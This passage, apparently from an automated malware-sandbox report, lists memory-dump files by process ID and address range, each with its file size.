                                                                                                              • memory/5836-1302-0x0000000007540000-0x000000000755E000-memory.dmp

                                                                                                                Filesize

                                                                                                                120KB

                                                                                                              • memory/5836-1292-0x000000006EC00000-0x000000006EC4C000-memory.dmp

                                                                                                                Filesize

                                                                                                                304KB

                                                                                                              • memory/5836-1322-0x0000000007CD0000-0x0000000007CE2000-memory.dmp

                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/5836-1236-0x00000000056E0000-0x0000000005D08000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.2MB

                                                                                                              • memory/5836-1309-0x0000000007620000-0x000000000763A000-memory.dmp

                                                                                                                Filesize

                                                                                                                104KB

                                                                                                              • memory/5836-1255-0x0000000005EC0000-0x0000000005F26000-memory.dmp

                                                                                                                Filesize

                                                                                                                408KB

                                                                                                              • memory/5964-1454-0x0000000000060000-0x00000000004E9000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.5MB

                                                                                                              • memory/5964-1462-0x0000000000060000-0x00000000004E9000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.5MB

                                                                                                              • memory/5996-2373-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.3MB

                                                                                                              • memory/5996-3056-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.3MB

                                                                                                              • memory/6068-4546-0x00000000002F0000-0x00000000007AC000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.7MB

                                                                                                              • memory/6068-4531-0x00000000002F0000-0x00000000007AC000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.7MB

                                                                                                              • memory/6568-1530-0x00000000001C0000-0x0000000000656000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.6MB

                                                                                                              • memory/6568-1485-0x00000000001C0000-0x0000000000656000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.6MB

                                                                                                              • memory/6600-4549-0x0000000000060000-0x00000000004E9000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.5MB

                                                                                                              • memory/6600-4551-0x0000000000060000-0x00000000004E9000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.5MB

                                                                                                              • memory/6604-4340-0x0000000000D60000-0x00000000011B4000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.3MB

                                                                                                              • memory/6604-4513-0x0000000000D60000-0x00000000011B4000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.3MB

                                                                                                              • memory/6604-4503-0x0000000000D60000-0x00000000011B4000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.3MB

                                                                                                              • memory/6604-4297-0x0000000000D60000-0x00000000011B4000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.3MB

                                                                                                              • memory/6604-4342-0x0000000000D60000-0x00000000011B4000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.3MB

                                                                                                              • memory/6644-4544-0x00000000002F0000-0x0000000000D13000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.1MB

                                                                                                              • memory/6644-4514-0x00000000002F0000-0x0000000000D13000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.1MB

                                                                                                              • memory/6644-4438-0x00000000002F0000-0x0000000000D13000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.1MB

                                                                                                              • memory/6656-4577-0x0000000006F40000-0x0000000006F7C000-memory.dmp

                                                                                                                Filesize

                                                                                                                240KB

                                                                                                              • memory/6656-4813-0x000000000A420000-0x000000000A4B2000-memory.dmp

                                                                                                                Filesize

                                                                                                                584KB

                                                                                                              • memory/6656-4583-0x00000000071D0000-0x00000000072DA000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                              • memory/6656-4576-0x0000000006EE0000-0x0000000006EF2000-memory.dmp

                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/6656-4575-0x00000000074D0000-0x0000000007AE8000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.1MB

                                                                                                              • memory/6656-4574-0x0000000000780000-0x0000000000BF8000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.5MB

                                                                                                              • memory/6656-4624-0x00000000084F0000-0x00000000086B2000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.8MB

                                                                                                              • memory/6656-4625-0x0000000008BF0000-0x000000000911C000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.2MB

                                                                                                              • memory/6656-4573-0x0000000000780000-0x0000000000BF8000-memory.dmp

                                                                                                                Filesize

                                                                                                                4.5MB

                                                                                                              • memory/6656-4814-0x000000000A790000-0x000000000A7AE000-memory.dmp

                                                                                                                Filesize

                                                                                                                120KB

                                                                                                              • memory/7028-1433-0x0000000007E50000-0x0000000007E92000-memory.dmp

                                                                                                                Filesize

                                                                                                                264KB

                                                                                                              • memory/7028-1505-0x00000000080D0000-0x00000000080E0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/7028-1431-0x0000000005560000-0x000000000556A000-memory.dmp

                                                                                                                Filesize

                                                                                                                40KB

                                                                                                              • memory/7028-1493-0x0000000008EE0000-0x00000000090EF000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.1MB

                                                                                                              • memory/7028-1497-0x00000000080D0000-0x00000000080E0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/7028-1402-0x0000000007920000-0x0000000007964000-memory.dmp

                                                                                                                Filesize

                                                                                                                272KB

                                                                                                              • memory/7028-1349-0x0000000006C20000-0x0000000006C6C000-memory.dmp

                                                                                                                Filesize

                                                                                                                304KB

                                                                                                              • memory/7028-1403-0x00000000079F0000-0x0000000007A66000-memory.dmp

                                                                                                                Filesize

                                                                                                                472KB

                                                                                                              • memory/7028-1490-0x0000000008EE0000-0x00000000090EF000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.1MB

                                                                                                              • memory/7028-1494-0x00000000080C0000-0x00000000080C6000-memory.dmp

                                                                                                                Filesize

                                                                                                                24KB

                                                                                                              • memory/7028-1500-0x00000000080D0000-0x00000000080E0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/7028-1501-0x00000000080D0000-0x00000000080E0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/7028-1502-0x00000000080D0000-0x00000000080E0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/7028-1503-0x00000000080D0000-0x00000000080E0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/7028-1504-0x00000000080D0000-0x00000000080E0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB